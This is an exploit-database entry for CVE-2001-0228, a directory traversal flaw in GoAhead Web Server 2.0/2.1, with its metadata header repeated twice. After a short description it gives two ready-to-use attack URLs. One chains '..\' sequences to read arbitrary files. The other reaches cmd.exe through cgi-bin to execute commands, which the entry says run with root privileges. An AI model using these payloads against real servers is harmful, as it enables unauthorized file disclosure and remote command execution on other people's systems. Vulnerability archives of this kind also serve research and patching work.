GoAhead Web Server 2.0/2.1 - Directory Traversal
| EKU-ID: 26155 | CVE: CVE-2001-0228;OSVDB-3694 | OSVDB-ID: |
| Author: Sergey Nenashev | Published: 2001-02-02 | Verified:
 |
| Download: | ||
Rating☆☆☆☆☆ |
| EKU-ID: 26155 | CVE: CVE-2001-0228;OSVDB-3694 | OSVDB-ID: |
| Author: Sergey Nenashev | Published: 2001-02-02 | Verified:
|
| Download: | ||
Rating☆☆☆☆☆ |
source: https://www.securityfocus.com/bid/2334/info A specially crafted URL composed of '..\' sequences along with the known filename will disclose the requested file. This vulnerability will also allow an attacker to execute arbitrary code with root privileges. Gaining access to a known file: http://target/..\..\..\..\..\..\filename Executing arbitrary commands: http://target/cgi-bin/..\..\..\..\..\..\winnt\system32\cmd.exe?/c+dir+c:\